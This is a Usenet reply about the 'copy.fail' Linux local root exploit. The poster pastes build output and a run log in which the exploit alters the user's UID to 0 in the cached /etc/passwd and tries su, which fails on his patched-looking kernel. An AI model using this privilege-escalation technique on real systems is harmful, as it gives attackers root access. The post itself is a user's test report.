Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > comp.os.linux.misc > #86032
| From | jayjwa <jayjwa@atr2.ath.cx.invalid> |
|---|---|
| Newsgroups | comp.os.linux.misc |
| Subject | Re: copy.fail |
| Date | 2026-04-30 11:25 -0400 |
| Organization | atr2net 2026 |
| Message-ID | <87lde4tqpy.fsf@atr2.ath.cx> (permalink) |
| References | <eli$2604300130@qaz.wtf> |
Eli the Bearded <*@eli.users.panix.com> writes:
> This is an instant local escalation to root that works on about nine
> years of kernel versions across many, if not all, distros. It's been
> patched, very recently, and there is a work-around.
I haven't been able to find a *clear* list of kernels that aren't
affected but it doesn't work on Slackware w/6.18.23. /bin/su needs to be
readable, but it's 4711 by default. Neither the C version nor the Python
version worked here. Some say 6.18 is already patched, but, again, no
clear list as of this writing.
make
cc -nostdlib -static -Os -s -ffreestanding -fno-asynchronous-unwind-tables -fno-ident -fno-stack-protector -Inolibc
-Wl,-N -Wl,-z,max-page-size=0x10 payload.c -o payload
/usr/bin/ld.bfd: warning: payload has a LOAD segment with RWX permissions
ld -r -b binary -o payload.o payload
cc -O2 -Wall -Wextra -Wl,-z,noexecstack -static -o exploit exploit.c payload.o
cc -O2 -Wall -Wextra -Wl,-z,noexecstack -static -o exploit-passwd exploit-passwd.c
/usr/bin/ld.bfd: /tmp/ccTwn0ob.o: in function `main':
exploit-passwd.c:(.text.startup+0x12): warning: Using 'getpwuid' in
statically linked applications requires at runtime the shared libraries from the glibc version used for linking
./exploit /bin/su
open(/bin/su): Permission denied
./exploit-passwd
[+] user: jayjwa (uid=1000)
[+] /etc/passwd UID field at offset 2324
[+] sanity check ok: bytes at offset are "1000"
[+] /etc/passwd page cache mutated; jayjwa's UID is now 0000
[+] attempting cashout via `su jayjwa`
[!] If su fails with "Cannot determine your user name"
(shadow-utils' caller-identity check), the page cache
mutation is still active. Pivot to another cashout
that consults /etc/passwd.
[+] cleanup after testing (run as root):
echo 3 > /proc/sys/vm/drop_caches
Password:
su: Authentication failure
--
PGP Key ID: 781C A3E2 C6ED 70A6 B356 7AF5 B510 542E D460 5CAE
"The Internet should always be the Wild West!"
Back to comp.os.linux.misc | Previous | Next — Previous in thread | Next in thread | Find similar
copy.fail Eli the Bearded <*@eli.users.panix.com> - 2026-04-30 05:40 +0000
Re: copy.fail Ralf Fassel <ralfixx@gmx.de> - 2026-04-30 16:39 +0200
Re: copy.fail jayjwa <jayjwa@atr2.ath.cx.invalid> - 2026-04-30 11:25 -0400
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-04-30 19:09 +0000
Re: copy.fail Marc Haber <mh+usenetspam2616@zugschl.us> - 2026-05-01 13:19 +0200
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-01 17:48 +0100
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-05-02 10:28 +0000
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-05-02 12:12 +0000
Re: copy.fail pa@see.signature.invalid (Pierre Asselin) - 2026-05-02 21:46 +0000
Re: copy.fail Lawrence D’Oliveiro <ldo@nz.invalid> - 2026-05-02 23:44 +0000
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-05-03 01:12 +0000
Re: copy.fail rbowman <bowman@montana.com> - 2026-05-03 02:46 +0000
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-03 09:55 +0100
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-02 23:02 +0100
Re: copy.fail pa@see.signature.invalid (Pierre Asselin) - 2026-05-03 18:11 +0000
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-03 23:05 +0100
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-04-30 22:41 +0100
Re: copy.fail Stéphane CARPENTIER <sc@fiat-linux.fr> - 2026-05-01 09:33 +0000
Re: copy.fail Ralf Fassel <ralfixx@gmx.de> - 2026-05-01 23:17 +0200
Re: copy.fail Rich <rich@example.invalid> - 2026-05-06 04:17 +0000
Re: copy.fail Woozy Song <suzyw0ng@outlook.com> - 2026-05-03 11:42 +0800
csiph-web